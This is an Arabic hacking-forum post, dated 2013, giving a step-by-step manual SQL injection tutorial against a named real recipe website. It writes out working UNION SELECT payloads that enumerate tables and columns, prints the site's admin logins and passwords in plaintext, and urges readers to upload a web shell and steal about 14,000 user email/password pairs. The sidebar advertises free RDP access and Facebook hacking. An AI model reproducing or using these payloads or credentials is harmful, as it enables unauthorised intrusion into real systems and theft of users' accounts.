منظمة الانونيموس الاسلامية للاختراق
اهلا بك فى منظمة انيموس الاسلامية للاختراق

دخول

لقد نسيت كلمة السر

بحـث
 
 

نتائج البحث
 


Rechercher بحث متقدم

المواضيع الأخيرة
» الحصول على VPS مجانا
السبت 02 يونيو 2018, 4:38 pm من طرف Chuchi

» موقع يعطيك سيرفر في بي اس لمدة شهر - هديه لعيون المنظمه
الأحد 13 مايو 2018, 10:41 pm من طرف anamax

» الدرس الأول ~ الحصول على RDP مجانا ~ دورة الهويـات المجهــولة
الأحد 06 مايو 2018, 1:01 pm من طرف yoyotam

» 10 Days Free Vps Trial 4GB ram+4Cpu
الأحد 29 أبريل 2018, 12:39 am من طرف meno2015r222

»  برنامج اللفلفة ل Conquer Online كااااااامل مكمل باشرح
الأحد 22 أبريل 2018, 7:01 pm من طرف mado40

» اختراق الفيس بوك بالعملاق جوجل
الخميس 12 أبريل 2018, 9:00 pm من طرف ياسين الحنين

» Get 30 days VPS in 30 seconds
الأحد 08 أبريل 2018, 10:56 am من طرف alwayshere2

» شرح كامل الحصول على rdp وكسر البرافيت لعيونكم ^_
الأحد 08 أبريل 2018, 10:54 am من طرف alwayshere2

» طريقتي في جلب حسابات rdp
الثلاثاء 03 أبريل 2018, 7:48 pm من طرف adam42

يوليو 2018
الإثنينالثلاثاءالأربعاءالخميسالجمعةالسبتالأحد
      1
2345678
9101112131415
16171819202122
23242526272829
3031     

اليومية اليومية

تدفق ال RSS


Yahoo! 
MSN 
AOL 
Netvibes 
Bloglines 


المتواجدون الآن ؟
ككل هناك 6 عُضو متصل حالياً :: 0 عضو مُسجل, 0 عُضو مُختفي و 6 زائر :: 1 روبوت الفهرسة في محركات البحث

لا أحد

[ مُعاينة اللائحة بأكملها ]


أكبر عدد للأعضاء المتواجدين في هذا المنتدى في نفس الوقت كان 176 بتاريخ الخميس 03 نوفمبر 2016, 12:28 am

اخترق الموقع بالحقن اليدوى

اذهب الى الأسفل

اخترق الموقع بالحقن اليدوى

مُساهمة من طرف Admin في السبت 11 مايو 2013, 5:31 pm

السلام عليكم ورحمه الله وبركاته
اليوم راح اعلمكم الاختراق اليدوى معانا على بركه الله
اول حاجه بتشوفلك حاجه اسمها Dork وده راس الثغره لان ده الى بيطلعلك مواقع دلوقتى انا اخترت دورك عاوز اجيب المواقع المصابه من غير تعب هنعمل ايه
هنخش على الموقع ده
http://isoftwarez.com/scanner/scanner/
تمام
نحط الدورك ونشوف المواقع الى هتطلعلنا
لو واحد جه بالون الرمادى يبقا مش مصاب لو بالون الابيض يبقى مصاب
تمام دلوقتى بقا جبنا موقع هنعمل ايه انا مثلا اخترت الموقع ده

كود:
http://www.recipes.onlineweblibrary.com/recipe.php?recipeid=410تمام عاوزين نعرف عدد العواميد المصابه بنعمل ايه بنحط الكلام ده ورا الرابط مع اضافه بعض الاشياء نشوف

كود:
http://www.recipes.onlineweblibrary.com/recipe.php?recipeid=-410+order+by+20--شوفتوا ضيفت ايه ده الكود
=-410+order+by+20--
تمام ونشوف وكل شويه لو فى خطا نقلل الرقم
تمام دلوقتى طلع اهه فتح عند رقم 3 نشوف بقا انهى عمود مصاب

كود:
http://www.recipes.onlineweblibrary.com/recipe.php?recipeid=-410+order+by+3--بتضيف الكود ده

كود:
+union+select+وتكتب وراه العواميد
يعنى احنا طلعلنا 3 يبقى كده

كود:
+union+select+1,2,3--تمام كده
انا طلعلى بردوا العمود رقم 3 حلو بقا اوى نستغل الموقع بقا

كود:
http://www.recipes.onlineweblibrary.com/recipe.php?recipeid=-410+union+select+1,2,3--نضع الكود ده فى العمود المصاب

كود:
group_concat(table_name)وده فى النهايه

كود:
+from+information_schema.tables+where+table_schema=database()--تمام كده هيبقا الرابط كده

كود:
http://www.recipes.onlineweblibrary.com/recipe.php?recipeid=-410+union+select+1,2,group_concat%28table_name%29+from+information_schema.tables+where+table_schema=database%28%29--تمام كده
شوفو ايه الى طلع

كود:
esnr_ad_groups,esnr_admin_control,esnr_admin_login,esnr_ads,esnr_categories,esnr_comments,esnr_emailed,esnr_ingredients,esnr_ratings,esnr_recipes,esnr_search_terms,esnr_subscribers,esnr_usersعاوزين نطلع مثلا الاميلات او الادمن والباص
هنعمل حاجه هنا بقا كتييير بيتطلغبط فيها بس انا هسهلهالكم
وركزوا بقا هنا
هنضع الكود ده مكان الكود الى شبهو الى فات

كود:
group_concat(column_name)وده بردو مكان الكود الى شبهوا الى فات

كود:
+from+information_schema.columns+where+table_schema=database()--شيفين الكلمه دى

كود:
database()دى بقا هنخش على الموقع ده
من هنا
http://www.waraxe.us/sql-char-encoder.html
تمام واختارنا مثلا esnr_admin_login
هنشفرها نحطها فى المربع الكبير
ونضغط encode now
وناخد الى فى المربع ده كوبى MySql hex-encoded string
انا شفرت الكلمه دى esnr_admin_login طلعت كده

كود:
0x65736e725f61646d696e5f6c6f67696eهنحطوا مكان كلمه

كود:
database()يبقى الموقع كلوا

كود:
http://www.recipes.onlineweblibrary.com/recipe.php?recipeid=-410+union+select+1,2,group_concat%28column_name%29+from+information_schema.columns+where+table_name=0x65736e725f61646d696e5f6c6f67696e--تمام دلوقتى شوفو طلع لينا ايه
login,password,sessionkey
دلوقتى هنحط الكود ده مكان العمود المصاب

كود:
group_concat(login,0x3e,password)طبعا مع تغيير ما يلزم يعنى عشان انا طلعلى لوج ان وباسورد كتبتهم شوف انت هيطلعلك ايه واكتبوا انما الكلمه دى 0x3e عشان يعمل فصله مبين كل يوزر ويوزر تمام كده
وبعديها امسح كل الى بعد كلمه from
واكتب + واسم الجدول الى انت اخترتوا يعنى انا اخترت esnr_admin_login
تمام يبقى كده

كود:
form+esnr_admin_loginيبقى الموقع كامل

كود:
http://www.recipes.onlineweblibrary.com/recipe.php?recipeid=-410+union+select+1,2,group_concat%28login,0x3e,password%29+from+esnr_admin_login--تمام والف مبروك طلعلك الادمين
changeme>changeme
admin>noha2008
يوزرين ادخل وارفع شيل
وكمان الموقع ده فيه 14 الف اميل بالباصورد عاوزكم تسحبوهم وتشتغلو يلا يا رجاله
avatar
Admin
Admin
Admin

عدد المساهمات : 1255
تاريخ التسجيل : 22/11/2011
العمر : 22
الموقع : http://ahmed2012.yoo7.com

http://ahmed2012.yoo7.com

الرجوع الى أعلى الصفحة اذهب الى الأسفل

الرجوع الى أعلى الصفحة


 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى